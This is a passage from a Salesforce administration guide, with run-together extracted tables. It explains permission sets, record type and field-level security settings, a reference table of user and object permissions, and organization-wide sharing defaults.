your work in the sales app, which includes tabs like Accounts and Opportunities. To track a new marketing campaign, rather
than adding the Campaigns tab to the sales app, you select Marketing from the app drop-down to view your campaigns and
campaign members.

The Apps section of the permission sets overview page contains settings that are directly associated with the business processes
the apps enable. For example, customer service agents might need to manage cases, so the “Manage Cases” permission is in
the Call Center section of the App Permissions page. Some app settings aren't related to app permissions. For example, to
enable the Time-Off Manager app from the AppExchange, users need access to the appropriate Apex classes and Visualforce
pages, as well as the object and field permissions that allow them to create new time-off requests. The Apps section contains
links to:

• Assigned apps
• Object settings, which include:

◊ Tab settings
◊ Record type settings
◊ Object permissions
◊ Field permissions

• Apex class access settings
• Visualforce page access settings

System Settings

Some system functions apply to an organization and not to any single app. For example, “View Setup and Configuration”
allows users to view setup and administrative settings pages. Other system functions apply to all apps. For example, the “Run
Reports” and “Manage Dashboards” permissions allow managers to create and manage reports in all apps. In some cases, such
as with “Modify All Data,” a permission applies to all apps, but also includes non-app functions, like the ability to download
the Data Loader.

In the permission sets overview page, the System section contains links to:

• System permissions
• Service providers (if you've enabled Salesforce as an identity provider)
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Using a Permission Set's Assigned Users Page

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view users that are assigned to a permission set:

To view all users that are assigned to a permission set, from the permission set overview page, click Assigned Users. From
the assigned users page, you can:

• Create one or multiple users

• Reset passwords for selected users

• Edit a user

• View a user's detail page by clicking the name, alias, or username

• View or edit a profile by clicking the profile name

• If Google Apps™ is enabled in your organization, export users to Google and create Google Apps accounts by clicking
Export to Google Apps

See Also:
Assigning Permission Sets

Searching Permission Sets

Available in: Enterprise, Professional, Developer, and Database.com Editions

Visualforce is not available in Database.com

User Permissions Needed

“View Setup and Configuration”To search permission sets:

On any of the permission sets detail pages, type at least three consecutive letters of an object, setting, or permission name in

the Find Settings... box. The search terms aren't case-sensitive. As you type, suggestions for results that match your search
terms appear in a list. Click an item in the list to go to its settings page. You can search for:

ExampleItem

Type sales in the Find Settings box, then select Sales from the list.Assigned apps

Type an existing object’s name. For example, let’s say you have an Albums
custom object, type albu, then select Albums.

Objects
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ExampleItem

Type the name of the object that contains the field. For example, let’s say
your Albums object contains a Description field. To find the Description

Fields

field for albums, type albu, select Albums, and scroll down to
Description under Field Permissions.

Type an existing tab’s name. For example, type rep, then select Reports.Tabs

Type the name of the object that contains the record type. For example,
let’s say you want to review the record type assignments in the Contacts
object. Type conta, then select Contacts.

Record types

Type apex, then select Apex Class Access.Apex class access settings

Type VISU, then select Visualforce Page Access.Visualforce page access settings

Type api, then select API Enabled.App and System permissions

Type serv, then select Service Providers.Service providers (available only if Salesforce is
enabled as an identity provider)

If no results appear in a search:

• The permission, object, or setting you're searching for may not be available in the current organization.

• The item you're searching for may not be available for the user license that's associated with the current permission set.
For example, a permission set with the Standard Platform User license doesn't include the “Modify All Data” permission.

• Be sure your search terms have at least three consecutive characters that match the object, setting, or permission name.

• Be sure the search term is spelled correctly.

See Also:
Permission Sets Overview

Viewing and Editing Assigned Apps in Permission Sets
Assigned app settings specify the apps that users can select in the Force.com app menu.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view assigned app settings:

“Manage Users”To edit assigned app settings:

Unlike profiles, you can’t assign a default app in permission sets. You can only specify whether apps are visible.

To assign apps:
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1. From Setup, click Manage Users > Permission Sets.
2. Select a permission set, or create one.
3. On the permission set overview page, click Assigned Apps.
4. Click Edit.
5. To assign apps, select them from the Available Apps list and click Add. To remove apps from the permission set, select

them from the Enabled Apps list and click Remove.
6. Click Save.

See Also:
Permission Sets Overview

Assigning Custom Record Types in Permission Sets

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To assign record types in permission sets:

1. From Setup, click Manage Users > Permission Sets.
2. Select a permission set, or create one.
3. On the permission set overview page, click Object Settings, then click the object you want.
4. Click Edit.
5. Select the record types you want to assign to this permission set.
6. Click Save.

See Also:
Overview of Record Type Access

Overview of Record Type Access

Available in: Enterprise, Unlimited, and Developer Editions

You can assign record types to users in their profile or permission sets, or a combination of both. Record type assignment
behaves differently in profiles and permission sets.

• A user’s default record type is specified in their profile. You can’t specify a default record type in permission sets.

• You can assign the --Master-- record type in profiles, but not permission sets; only custom record types can be assigned
in permission sets. Depending on the record types assigned in profiles:
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◊ If users have --Master-- on their profile and no custom record types in their permission sets, when they create a
record, the Master record type is associated with the new record.

◊ If users have --Master-- on their profile and only one custom record type in their permission sets, when they create
a record, the new record is associated with the custom record type. Users won’t have the option to select the Master
record type.

◊ If users have --Master-- on their profile and multiple custom record types in their permission sets, when they create
a record, they’re prompted to choose a record type. In their personal settings, users don’t have the option to automatically
use their default record type.

◊ If users have a custom record type on their profile and any custom record types in their permission sets, when they
create a record, they’re prompted to choose a record type. In their personal settings, users can set an option to
automatically use their default record type and not be prompted to choose a record type.

• Page layout assignments are specified in profiles only—they’re not available in permission sets. When you assign a custom
record type in a permission set, users with that permission set get the page layout assignment that’s specified for that record
type in their profile. (In profiles, page layout assignments are specified for every record type, even when record types aren’t
assigned.)

• For lead conversion, the default record type specified in a user’s profile is used for the converted records.

• Users can view records assigned to any record type. As a result, a page layout is assigned to every record type on a user's
profile. A record type assignment on a user’s profile or permission set does not determine whether a user can view a record
with that record type; rather, the record type assignment simply specifies that the user can use that record type when
creating or editing a record.

• Record types in permission sets aren’t supported in packages and change sets. As a result, any record type assignments in
permission sets in a sandbox organization must be manually reproduced in a production organization.

See Also:
Assigning Record Types and Page Layouts in the Enhanced Profile User Interface
Assigning Record Types to Profiles in the Original Profile User Interface
Assigning Custom Record Types in Permission Sets
Assigning Page Layouts in the Original Profile User Interface

Assigning Permission Sets

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view users that are assigned to a permission set:

“Manage Users”To assign permission sets:

From the user detail page, you can assign permission sets or remove a permission set assignment.

1. From Setup, click Manage Users > Users.
2. Select a user.
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3. In the Permission Set Assignments related list, click Edit Assignments.
4. To assign a permission set, select it from the Available Permission Sets box and click Add. To remove a permission set

assignment, select it from the Enabled Permission Sets box and click Remove.

Note:  The Permission Set Assignments page shows permission sets with no associated license and permission
sets that match the user's license. For example, if a user's license is Chatter Only, you can assign permission sets
with the Chatter Only license and permission sets with no associated license to that user.

If you assign a permission set with no associated user license, all of its enabled settings and permissions must be
allowed by the user’s license, or the assignment will fail.

5. Click Save.

See Also:
About User Licenses in Permission Sets

FIELD ACCESS

About Field Accessibility
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Page layouts are not available in Database.com

Several factors help control whether users can view and edit specific fields in Salesforce.

• Page layouts—You can set whether fields are visible, required, editable, or read only.

• Field-level security—You can further restrict users' access to fields by setting whether those fields are visible, editable, or
read only. These settings override any field properties set in the page layout if the field-level security setting is more
restrictive.

Note: Field-level security doesn’t prevent searching on the values in a field. When search terms match on field
values protected by field-level security, the associated records are returned in the search results without the protected
fields and their values.

• Permissions—Some user permissions override both page layouts and field-level security settings. For example, users with
the “Edit Read Only Fields” permission can always edit read-only fields regardless of any other settings.

• Universally required fields—A custom field can be made universally required, which overrides any less-restrictive settings
on page layouts or field-level security.
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After setting these items, you can confirm users' access to specific fields using the field accessibility grid.

See Also:
Modifying Field Access Settings

Checking Field Accessibility for a Particular Field

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view field accessibility:

1. Navigate to the fields area of the appropriate object:

• For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
• For custom task and event fields, from Setup, click Customize > Activities > Activity Custom Fields.
• For standard task and event fields, from Setup, click Customize > Activities, then click Task Fields or Event Fields.
• For custom objects, from Setup, click Create > Objects, and select an object.
• For Knowledge validation status picklists, from Setup, click Customize > Knowledge > Validation Statuses.

2. Select a field and click View Field Accessibility.
3. Confirm that the field access is correct for different profiles and record types.
4. Hover your mouse over any field access setting to see whether the field is required, editable, hidden, or read only based on

the page layout or field-level security.
5. Click any field access setting to change the field's accessibility.

For advanced options to check field accessibility by a specific profile, record type, or field, from Setup, click Security Controls
> Field Accessibility. From this page, you need to choose a particular tab to view and then select whether you want to check
access by profiles, record types, or fields.

Note: In this user interface, you can't check access for permission sets.

Field-level security doesn't prevent searching on the values in a field. To set up your organization to prevent users
from searching and retrieving records that match a value in a field hidden by field-level security, contact Customer
Support.

See Also:
About Field Accessibility
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Modifying Field Access Settings

Available in: Enterprise, Unlimited, and Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view field accessibility:

“Customize Application”

AND

“Manage Users”

To change field accessibility:

From the field accessibility grid, you can click any field access setting to change the field’s accessibility in the page layout or
in field-level security. The Access Settings page then lets you modify the field access settings.

• In the Field-Level Security section of the page, specify the field's access level for the profile.

Enabled SettingsAccess Level

VisibleUsers can read and edit the field.

Visible and Read-OnlyUsers can read but not edit the field.

NoneUsers can’t read or edit the field.

We recommend that you use field-level security to control users’ access to fields rather than creating multiple page layouts
to control field access.

• In the Page Layout section of the page, you can:

◊ Select the Remove or change editability radio button and then change the field access properties for the page
layout. These changes will affect all profile and record type combinations that currently use this page layout.

◊ Alternatively, you can select the Choose a different page layout radio button to assign a different page layout
to the profile and record type combination.

See Also:
About Field Accessibility
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Field-Level Security Overview
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Note: Who Sees What: Field-level Security (3:58 minutes)

Watch how you can restrict access to specific fields on a profile by profile basis.

Field-level security settings let administrators restrict users’ access to view and edit specific fields in:

• Detail and edit pages

• Related lists

• List views

• Reports

• Connect Offline

• Email and mail merge templates

• Custom links

• The partner portal

• The Salesforce Customer Portal

• Synchronized data

• Imported data

The fields that users see on detail and edit pages are a combination of page layouts and field-level security settings. The most
restrictive field access settings of the two always apply. For example, if a field is required in the page layout and read-only in
the field-level security settings, the field-level security overrides the page layout and the field will be read-only for the user.

Important: Field-level security doesn’t prevent searching on the values in a field. When search terms match on field
values protected by field-level security, the associated records are returned in the search results without the protected
fields and their values.

You can define field-level security in any of the following ways:

• For multiple fields on a single permission set or profile

• For a single field on all profiles

After setting field-level security for users, you can:

• Create page layouts to organize the fields on detail and edit pages.

Tip:  Use field-level security as the means to restrict users’ access to fields; then use page layouts primarily to
organize detail and edit pages within tabs. This reduces the number of page layouts for you to maintain.

• Verify users’ access to fields by checking the field accessibility.

• Customize search layouts to set the fields that display in search results, in lookup dialog search results, and in the key lists
on tab home pages.
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Note:  Roll-up summary and formula fields are always read-only on detail pages and not available on edit pages. They
may also be visible to users even though they reference fields that your users cannot see. Universally required fields
always display on edit pages regardless of field-level security.

The relationship group wizard allows you to create and edit relationship groups regardless of field-level security.

See Also:
Administrator tip sheet: Tips & Hints for Page Layouts and Field-Level Security

Setting Field Permissions in Permission Sets and Profiles
Field permissions specify the access level for each field in an object.

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To set field-level security:

1. From Setup, click Manage Users, then click Permission Sets or Profiles.
2. Select a permission set or profile.
3. Depending on which interface you're using, do one of the following:

• Permission sets or enhanced profile user interface—In the Find Settings... box, enter the name of the object you want
and select it from the list. Click Edit, then scroll to the Field Permissions section.

• Original profile user interface—In the Field-Level Security section, click View next to the object you want to modify,
and then click Edit.

4. Specify the field's access level.
5. Click Save.

Setting Field-Level Security for a Single Field on All Profiles

Available in: Enterprise, Unlimited and Developer Editions

User Permissions Needed

“Customize Application”To set field-level security:

1. From Setup, click Customize, click a tab or activity link, and click Fields.
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2. Select the field you want to modify.
3. Click Set Field-Level Security.
4. Specify the field's access level.
5. Click Save.

PERMISSIONS REFERENCE

User Permissions
The user permissions available vary according to which edition you have.

The following table lists all user permissions in alphabetical order. The Profiles column lists the standard profiles where the
permission is enabled by default.

You can enable user permissions in permission sets and profiles. In permission sets and the enhanced profile user interface,
these permissions are listed in the App Permissions or System Permissions pages. In the original profile user interface, they
are listed under Administrative Permissions and General User Permissions.

ProfilesDescriptionPermission Name

System Administrator

Contract Manager

Change contract status to Activated.Activate Contracts

System AdministratorChange order status to Activated.Activate Orders

System Administrator

Standard User

Filter search results, list views, and reports by division.Affected by Divisions

Solution Manager

Marketing User

Contract Manager

System AdministratorAccess any Salesforce API.API Enabled

NoneAccess Salesforce only through a Salesforce API.API Only User

System Administrator

Contract Manager

Approve or reject a contract from a related list.Approve Contracts

System AdministratorCreate Apex classes and triggers.Author Apex

System AdministratorRun reports in the background, and export results as a CSV
or Excel file on completion.

Background Report Export
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ProfilesDescriptionPermission Name

NoneDelete records in the Bulk API without storing them in the
Recycle Bin, making them eligible for immediate deletion..

Bulk API Hard Delete

System Administrator

Standard User

Use all Chatter features.Chatter Internal User

Solution Manager

Marketing User

Read Only

Contract Manager

Chatter Moderator User

Chatter Free User

System Administrator

Standard User

Convert leads into accounts, contacts, and opportunities.Convert Leads

Solution Manager

Marketing User

Contract Manager

System Administrator

Standard User

Create, edit, and delete reports.Create and Customize Reports

Solution Manager

Marketing User

Read Only

Contract Manager

System AdministratorCreate and manage communities, add community members,
and customize appearance.

Create and Manage
Communities

System Administrator

Standard User

Create and become owner of groups in ChatterCreate and Own New Chatter
Groups

Chatter Moderator User

Chatter Free User

Chatter Only

Solution Manager

Marketing User

Contract Manager

Partner User
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ProfilesDescriptionPermission Name

Customer Portal User

Customer Portal Manager
Standard

System Administrator

Standard User

Share a Chatter file with anyone by creating a file link and
sending it via email or IM.

Create and Share Links to
Chatter Files

Solution Manager

Marketing User

Read Only

Contract Manager

System AdministratorCreate and upload a change set.Create and Upload Change
Sets

System AdministratorCreate packages that can be distributed through AppExchange.
Use outbound change sets.

Create AppExchange
Packages

System AdministratorCreate Salesforce CRM Content libraries.Create Libraries

System AdministratorCustomize the organization using Setup menu options.Customize Application

System AdministratorRun the data export service.Data Export

NoneInstall the Data residency Option (DRO) software,
documentation, and patches.

Data Residency Option
Admin

NoneManage external users who belong to the same account.

If Communities is enabled in your organization, applies to
external users within communities.

Delegated External User
Administrator

System AdministratorDelete contracts, regardless of their status.Delete Activated Contracts

System Administrator

Standard User

Enables non-Content users to create content deliveries, and
enables Salesforce CRM Content users to create content
deliveries using documents in their personal libraries.

Deliver Uploaded Files and
Personal Content

Solution Manager

Marketing User

Read Only

Contract Manager

System AdministratorDeploy change sets sent from another organization.Deploy Change Sets

System AdministratorInstall or uninstall AppExchange packages as system
administrators.

Download AppExchange
Packages

System AdministratorCreate, edit, and delete dashboards through the drag-and-drop
dashboard builder interface.

Drag-and-Drop Dashboard
Builder
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ProfilesDescriptionPermission Name

System AdministratorCreate, edit, and delete activated orders.Edit Activated Orders

NoneEdit their own case comments but not other user's comments.Edit Case Comments

System Administrator

Standard User

Create, edit, and delete events.Edit Events

Solution Manager

Marketing User

Contract Manager

System Administrator

Standard User

In Forecasts (Classic), create, edit, and delete forecasts.

This permission is not available for Customizable Forecasts
or Collaborative Forecasts. If you migrate to Customizable

Edit Forecasts

Solution Manager
Forecasts, custom profiles that have the “Edit Forecasts”

Marketing Userpermission get the “Edit Personal Quota” and “Override
Forecasts” permissions. Contract Manager

System Administrator

Marketing User

Create, edit, and delete HTML email templates.Edit HTML Templates

System Administrator

Standard User

Change the sales price on opportunity line items.Edit Opportunity Product
Sales Prices

Solution Manager

Marketing User

Contract Manager

System Administrator

Standard User

In Customizable Forecasts, change your individual quota
amount.

Edit Personal Quota

Solution Manager

Marketing User

Contract Manager

System AdministratorEdit fields that are read only due to page layouts or field-level
security.

Edit Read Only Fields

System Administrator

Standard User

Enable and disable contacts for Self-Service and Customer
Portal access.

Edit Self-Service Users

Solution Manager

Marketing User

Contract Manager
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ProfilesDescriptionPermission Name

System Administrator

Standard User

Create, edit, and delete tasks.Edit Tasks

Solution Manager

Marketing User

Contract Manager

System Administrator

Standard User

Use Export Details and Printable View to export reports.Export Reports

Solution Manager

Marketing User

Contract Manager

System Administrator

Marketing User

Import leads and update campaign history.Import Leads

System Administrator

Standard User

Import personal accounts and contacts.Import Personal Contacts

Solution Manager

Marketing User

Contract Manager

System Administrator

Solution Manager

Import solutions for the organization.Import Solutions

System AdministratorSet the CreatedById or CreatedDate for a Chatter post
or comment from the API when creating the record.

Insert System Field Values for
Chatter Feeds

System Administrator

Standard User

Invite customers to Chatter.Invite Customers to Chatter

Solution Manager

Marketing User

Read Only

Contract Manager

Chatter Moderator User

Chatter Free User

Chatter External User

NoneDelegate username and password authentication to a corporate
database instead of the Salesforce user database.

Is Single Sign-On Enabled
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ProfilesDescriptionPermission Name

System AdministratorLog in to subscriber organizations to perform package support
using the Subscriber Support Tab.

Log in to Subscriber
Organization

System AdministratorCreate, edit, and delete analytic snapshots.Manage Analytic Snapshots

NoneCreate, edit, assign, publish, archive, and translate Salesforce
Knowledge articles.

Manage Articles

System AdministratorPurchase additional licenses and features.Manage Billing

System AdministratorCreate, edit, and delete authentication providers.Manage Auth. Providers

System AdministratorCreate, edit, and delete business holidays.Manage Business Hours
Holidays

System AdministratorCreate, import, edit, and delete a call center configuration.Manage Call Centers

System AdministratorAdminister case settings, including Email-to-Case and mass
transfer of cases.

Manage Cases

System AdministratorDefine and modify solution categories settings.Manage Categories

System AdministratorAllows a user to create and update connections and templates
in Salesforce to Salesforce.

Manage Connections

NoneAccess all users' messages sent in Chatter.Manage Chatter Messages

System AdministratorCreate, edit, and delete library permissions in Salesforce CRM
Content.

Manage Content Permissions

System AdministratorCreate, edit, and delete custom fields in Salesforce CRM
Content.

Manage Content Properties

System AdministratorCreate, edit, and delete content types in Salesforce CRM
Content.

Manage Content Types

System AdministratorCreate and edit custom report types.Manage Custom Report
Types

System AdministratorCreate, edit, and delete the user's personal dashboards.Manage Dashboards

System AdministratorCreate, edit, and delete data categories.Manage Data Categories

System AdministratorMonitor or abort Bulk API jobs.Manage Data Integrations

System AdministratorCreate, edit, and delete dynamic dashboards.Manage Dynamic Dashboards

System AdministratorCreate, edit, and delete Outlook configurations for
Salesforce for Outlook.

Manage Email Client
Configurations

System AdministratorEnable, create, and update entitlement management items.Manage Entitlements

System AdministratorCreate partner accounts and partner users.

If Communities is enabled, you can also create and manage
customer users with access to Communities.

Manage External Users
(previously known as Manage
Partners)

System AdministratorCreate, edit, delete, and manage flows.Manage Force.com Flow
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ProfilesDescriptionPermission Name

System AdministratorChange the status of multiple leads in a list view.Manage Leads

System Administrator

Marketing User

Create, edit, and delete letterheads for HTML emails.Manage Letterheads

System AdministratorManage Salesforce Classic users and devices.Manage Mobile
Configurations

System AdministratorManage package licenses in subscriber organizations.Manage Package Licenses

System Administrator

Marketing User

Create, edit, and delete folders for public documents.Manage Public Documents

System AdministratorCreate, edit, and delete public list views.Manage Public List Views

System AdministratorCreate, edit, and delete public reports.Manage Public Reports

System Administrator

Marketing User

Create, edit, and delete text emails, mail merge templates, and
folders for public email templates.

Manage Public Templates

System Administrator

Solution Manager

Create, edit, and delete publicly accessible solutions.Manage Published Solutions

System AdministratorIn the Collaborative Forecasts, upload quota information
through the API and edit quota information.

This permission is not available for Forecasts (Classic) and
Customizable Forecasts.

Manage Quotas

System AdministratorManage, create, edit and delete remote access applications.Manage Remote Access

System AdministratorCreate, edit, and delete libraries and library memberships.Manage Salesforce CRM
Content

System AdministratorManage Salesforce Knowledge settings, and create, edit, and
delete article types.

Manage Salesforce Knowledge

System AdministratorManage Self-Service portal settings and reports.Manage Self-Service Portal

System AdministratorSuspend and resume sharing calculations.Manage Sharing Calculation
Deferral

System AdministratorCreate, edit, and delete synonym groups.Manage Synonyms

System AdministratorManage territory configurations.Manage Territories

System AdministratorManage translated labels in the Translation Workbench.Manage Translation

System AdministratorCreate, edit, and deactivate users (including external users),
and manage security settings, including profiles and roles.

Manage Users

System Administrator

Standard User

Edit multiple records simultaneously from a list with inline
editing.

Mass Edits from Lists
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ProfilesDescriptionPermission Name

Solution Manager

Marketing User

Contract Manager

Standard Platform User

Standard Platform One App
User

System Administrator

Standard User

Send mass emails to contacts and leads.Mass Email

Solution Manager

Marketing User

Contract Manager

System Administrator

Chatter Moderator User

Deactivate Chatter Free users, assign moderator privileges to
Chatter Free users, and remove posts.

Moderate Chatter

System AdministratorCreate, edit, and delete all organization data, regardless of
sharing settings.

Modify All Data

System Administrator

Standard User

Override forecasts of direct reports.Override Forecasts

Solution Manager

Marketing User

Contract Manager

NonePrevent the user's password from expiring.Password Never Expires

NoneAllows Customer Portal users to view and edit all cases for
their account.

Portal Super User

System Administrator

Standard User

Make products and price books available in Connect Offline.Products Show in Offline

Solution Manager

Marketing User

Read Only

Contract Manager

System AdministratorCreate, edit, and delete reports through the drag-and-drop
report builder interface.

Report Builder

System AdministratorUnlock user accounts that are locked, and reset user passwords.Reset User Passwords and
Unlock Users
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ProfilesDescriptionPermission Name

NoneRun flows.Run Flows

System Administrator

Standard User

Run reports and dashboards.Run Reports

Solution Manager

Marketing User

Read Only

Contract Manager

System AdministratorSchedule when dashboards refresh, and send email
notifications that include refreshed dashboards in HTML
format.

Schedule Dashboards

System AdministratorSchedule reports to run and have the results emailed to
Salesforce users.

Schedule Reports

System Administrator

Standard User

Send email to a single contact or lead.Send Email

Solution Manager

Marketing User

Contract Manager

System Administrator

Standard User

Send outbound messages to an external Web service API.Send Outbound Messages

Solution Manager

Marketing User

Read Only

Contract Manager

Standard Platform User

Standard Platform One App
User

System Administrator

Standard User

Send Stay-in-Touch update emails.Send Stay-in-Touch Requests

Solution Manager

Marketing User

Contract Manager

NoneDisplay a custom sidebar on all pages in Salesforce. If the
Show Custom Sidebar Components on All Pages

Show Custom Sidebar On All
Pages
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ProfilesDescriptionPermission Name

user interface setting is selected, the “Show Custom Sidebar
On All Pages” permission is not available.

System AdministratorSubmit orders for approval.SubmitOrders

System AdministratorManage the configuration of private and public tags.Tag Manager

System AdministratorChange a case's owner.Transfer Cases

System AdministratorChange a lead's owner.Transfer Leads

System AdministratorTransfer ownership of accounts, campaigns, cases, contacts,
contracts, leads, and custom objects that are owned by another
user.

Transfer Record

System AdministratorUpload packages to AppExchange for distribution. Use
outbound change sets.

Upload AppExchange
Packages

NoneUse Case Feed to manage cases.Use Case Feed

System AdministratorMass reassign account team and opportunity team members.Use Team Reassignment
Wizards

System AdministratorView all organizational data, regardless of sharing settings.View All Data

System AdministratorIn Customizable Forecasts and the Collaborative Forecasts,
view any user’s forecast, regardless of the forecast hierarchy.

View All Forecasts

NoneView Salesforce CRM Content from a portal.View Content in Portals

System AdministratorView the Data Categories page.View Data Categories

NoneView the value of encrypted fields in plain text.View Encrypted Data

System Administrator

Standard User

View the global header to access communities and personal
setup and customization options. You can’t disable this
permission on standard profiles.

View Global Header

Solution Manager

Marketing User

Read Only

Contract Manager

Chatter Moderator User

Chatter Free User

System AdministratorView dashboards owned by people under them in the role
hierarchy.

View My Team's Dashboards

System Administrator

Standard User

View Setup pages.View Setup and Configuration

Solution Manager

Marketing User

374

User PermissionsManage User Access to Data



ProfilesDescriptionPermission Name

Read Only

Contract Manager

Object Permissions
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Object permissions either respect or override sharing rules and settings. You can enable object permissions in permission sets
and custom profiles. The following permissions specify the access that users have to objects.

Respects or Overrides
Sharing?

DescriptionPermission

Respects sharingUsers can only view records of this type.Read

Respects sharingUsers can read and create records.Create

Respects sharingUsers can read and update records.Edit

Respects sharingUsers can read, edit, and delete records.Delete

Overrides sharingUsers can view all records associated with this object, regardless
of sharing settings.

View All

Overrides sharingUsers can read, edit, delete, transfer, and approve all records
associated with this object, regardless of sharing settings.

Modify All

Note:  “Modify All” on documents allows access to
all shared and public folders, but not the ability to
edit folder properties or create new folders. To edit
folder properties and create new folders, users must
have the “Manage Public Documents” permission.

See Also:
“View All” and “Modify All” Permissions Overview
Comparing Security Models
Field Permissions
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“View All” and “Modify All” Permissions Overview

Available in: All Editions

The “View All” and “Modify All” permissions ignore sharing rules and settings, allowing administrators to quickly grant access
to records associated with a given object across the organization. “View All” and “Modify All” may be preferable alternatives
to the “View All Data” and “Modify All Data” permissions. Be aware of the following distinctions between the permission
types.

Users who Need themUsed forPermissions

Delegated administrators who need to manage
records for specific objects

Delegation of object permissionsView All

Modify All

Administrators of an entire organizationManaging all data in an organization; for example,
data cleansing, deduplication, mass deletion, mass
transferring, and managing record approvals

View All Data

Modify All Data

“View All” and “Modify All” are not available for ideas, price books, article types, and products.

“View All” and “Modify All” allow for delegation of object permissions only. To delegate user administration and custom
object administration duties, define delegated administrators.

See Also:
Object Permissions

Comparing Security Models

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Salesforce user security is an intersection of sharing, and user and object permissions. In some cases, such as in end-user record
level access, it is advantageous to use sharing to provide access to records. In other cases, such as when delegating record
administration tasks like transferring records, cleansing data, deduplicating records, mass deleting records, and delegating
workflow approval processes, it is advantageous to override sharing and use permissions to provide access to records.

The “Read,” “Create,” “Edit,” and “Delete” permissions respect sharing settings, which control access to data at the record
level. The “View All” and “Modify All” permissions override sharing settings for specific objects. Additionally, the “View All
Data” and “Modify All Data” permissions override sharing settings for all objects.

The following table describes the differences between the security models.
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Permissions that Override SharingPermissions that Respect Sharing

Delegated data administratorsEnd-usersTarget audience

“View All” and “Modify All”“Read,” “Create,” “Edit,” and “Delete”
object permissions;

Sharing settings

Where managed

“View All” and “Modify All”Private, Read-Only, Read/Write,
Read/Write/Transfer/Full Access

Record access levels

Available on all objects with “Modify All”Respects sharing settings, which vary by
object

Ability to transfer

Available on all objects with “Modify All”NoneAbility to approve records, or edit and
unlock records in an approval process

Available on all objects with “View All”Available with a sharing rule that states:
the records owned by the public group

Ability to report on all records

“Entire Organization” are shared with a
specified group, with Read-Only access

Available on most objects via object
permissions

Available on all objects except products,
documents, solutions, ideas, notes, and
attachments

Object support

Note: “View All” and “Modify
All” are not available for ideas,
price books, article types, and
products.

Profile or permission setsRoles, Roles and Subordinates, Roles and
Internal Subordinates, Roles, Internal

Group access levels determined by

and Portal Subordinates, Queues, Teams,
and Public Groups

Available on private contacts,
opportunities, and notes and attachments
with “View All” and “Modify All”

Not availablePrivate record access

Available on all objects with “Modify All”Available to the record owner and any
user above the record owner in the role
hierarchy

Ability to manually share records

Available with “Modify All” on casesNot availableAbility to manage all case comments
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Field Permissions
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Field permissions specify the access level for each field in an object. In permission sets and the enhanced profile user interface,
the setting labels differ from those in the original profile user interface and in field-level security pages for customizing fields.

Enabled Settings in Original Profile
and Field-Level Security Interfaces

Enabled Settings in Permission Sets
and Enhanced Profile User Interface

Access Level

VisibleRead and EditUsers can read and edit the field.

Visible and Read-OnlyReadUsers can read but not edit the field.

NoneNoneUsers can't read or edit the field.

See Also:
Field-Level Security Overview
Object Permissions

SHARING

Overview of Sharing Settings
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Teams are not available in Database.com

In Salesforce, you can control access to data at many different levels. For example, you can control the access your users have
to objects with object permissions. Within objects, you can control the access users have to fields using field-level security. To
control access to data at the record level, use sharing settings.

Organization-Wide Defaults

Your organization-wide default sharing settings give you a baseline level of access for each object and enable you to extend
that level of access using hierarchies or sharing rules. For example, you can set the organization-wide default for leads to Private
if you only want users to view and edit the leads they own. Then, you can create lead sharing rules to extend access of leads to
particular users or groups.
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Sharing Rules

Sharing rules represent the exceptions to your organization-wide default settings. If you have organization-wide sharing defaults
of Public Read Only or Private, you can define rules that give additional users access to records they do not own. You can
create sharing rules based on record owner or field values in the record.

Tip: Sometimes it’s impossible to define a consistent group of users who need access to a particular set of records.
In those situations, record owners can use manual sharing to give read and edit permissions to users who would not
have access to the record any other way. Although manual sharing isn’t automated like organization-wide sharing
settings, role hierarchies, or sharing rules, it gives record owners the flexibility to share particular records with users
that need to see them.

Apex Managed Sharing

Apex managed sharing allows developers to programmatically share custom objects. When you use Apex managed sharing to
share a custom object, only users with the “Modify All Data” permission can add or change the sharing on the custom object's
record, and the sharing access is maintained across record owner changes.

Other Methods for Allowing Access to Records

In addition to sharing settings, there are a few other ways to allow multiple users access to given records:

Map category groups to roles
Control access to data categories by mapping them to user roles.

Queues
Queues help your teams manage leads, cases, service contracts, and custom objects. Once records are placed in a queue
manually or through an automatic case or lead assignment rule, records remain there until they're assigned to a user or
taken by one of the queue members. Any queue member or users above them in the role hierarchy can take ownership
of records in a queue. Use queues to route lead, case, and custom object records to a group.

Teams
For accounts, opportunities, and cases, record owners can use teams to allow other users access to their records. A team
is a group of users that work together on an account, sales opportunity, or case. Record owners can build a team for each
record that they own. The record owner adds team members and specifies the level of access each team member has to
the record, so that some team members can have read-only access and others can have read/write access. The record
owner can also specify a role for each team member, such as “Executive Sponsor.” In account teams, team members also
have access to any contacts, opportunities, and cases associated with an account.

Note:  A team member may have a higher level of access to a record for other reasons, such as a role or sharing
rule. In this case, the team member has the highest access level granted, regardless of the access level specified
in the team.

See Also:
About Organization-Wide Sharing Defaults
Sharing Rules Overview
Overview of Roles
Sharing Considerations

379

Overview of Sharing SettingsManage User Access to Data



About Organization-Wide Sharing Defaults
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions.

Customer Portal is not available in Database.com

Administrators can use organization-wide sharing settings to define the default sharing settings for an organization.
Organization-wide sharing settings specify the default level of access to records and can be set separately for accounts (including
assets and contracts), activities, contacts, campaigns, cases, leads, opportunities, calendars, price books, and custom objects.
For most objects, organization-wide sharing settings can be set to Private, Public Read Only, or Public Read/Write.

Note:  Setting an object to Private makes those records visible to record owners and those above them in the role
hierarchy.

In environments where the organization-wide sharing setting for an object is Private or Public Read Only, an administrator
can grant users additional access to records by setting up a role hierarchy or defining sharing rules. However, sharing rules can
only be used to grant additional access—they cannot be used to restrict access to records beyond what was originally specified
with the organization-wide sharing defaults.

Important:  If your organization uses a Customer Portal, before you enable contacts to access the portal, set the
